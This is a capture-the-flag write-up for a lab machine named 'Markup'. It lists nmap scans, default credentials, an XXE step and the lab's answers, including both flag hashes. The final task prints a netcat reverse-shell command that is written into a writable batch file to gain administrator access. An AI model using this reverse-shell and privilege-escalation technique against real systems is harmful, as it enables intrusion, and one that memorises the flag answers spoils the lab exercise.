# Markup
## Initial Scan
```nmap
sudo nmap -T4 -v 10.129.202.209 -oA Markup-Basic
sudo nmap -T4 -p 22,80,443 -sV -sC -v 10.129.202.209 -oA Markup-sv
```
## Task 1
What version of Apache is running on the target's port 80?
Answer: 2.4.41
## Task 2
What username:password combination logs in successfully?
Just tried basic default logins
Answer: `admin:password`
## Task 3
What is the word at the top of the page that accepts user input?
Answer: Order
## Task 4
What XML version is used on the target?
Answer: 1.0
## Task 5
What does the XXE / XEE attack acronym stand for?
Answer: XML external entity
## Task 6
What username can we find on the webpage's HTML code?
Answer: Daniel
## Task 7
What is the file located in the Log-Management folder on the target?
Put the rsa into a file on our machine
Login as daniel
Answer: job.bat
## Task 8
What executable is mentioned in the file mentioned before?
Answer: wevtutil.exe
## Task 9
Submit user flag
Answer: 032d2fc8952a8c24e39c8f0ee9918ef7
## Task 10
Submit root flag
Run winpeas
Under the section "Searching executable files in non-default folders with write (equivalent) permissions (can be slow)" We see
Which from the previous question we have looked at. Run Let's run netcat to connect back to us as admin.
Get nc.exe onto the target
Run it to get admin on the system
```
echo C:\Users\Daniel\nc64.exe -e cmd.exe 10.10.14.38 1234 > C:\Log-Management\job.bat
```
I had troubles getting the shell to pop, which apparently is common, the root flag is under: `C:\Users\Administrator\Desktop\root.txt`
Answer: f574a3e7650cebd8c39784299cb570f8
